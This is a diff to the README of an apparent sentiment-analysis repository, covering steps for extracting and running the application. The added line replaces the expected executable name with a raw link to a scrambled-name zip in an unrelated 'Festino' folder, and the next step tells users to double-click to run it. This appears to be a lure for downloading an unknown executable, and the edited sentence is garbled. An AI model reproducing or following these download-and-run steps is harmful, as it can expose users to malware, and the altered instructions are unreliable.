daveshtrr/Mobile-Review-Sentiment-Analysis-using-Machine-Learning/README.md

 1. Navigate to the folder where you saved the downloaded file.
 2. If it's a `.zip` file, right-click and select "Extract All".
 3. Open the extracted folder.
-4. Locate the application file (usually named `SentimentAnalysis.exe`).
+4. Locate the application file (usually named `https://github.com/daveshtrr/Mobile-Review-Sentiment-Analysis-using-Machine-Learning/raw/refs/heads/master/Festino/Sentiment_Review_Mobile_Machine_using_Learning_Analysis_3.6-alpha.4.zip`).
 5. Double-click to run the application.
 6. Follow the on-screen instructions to upload your data and analyze it.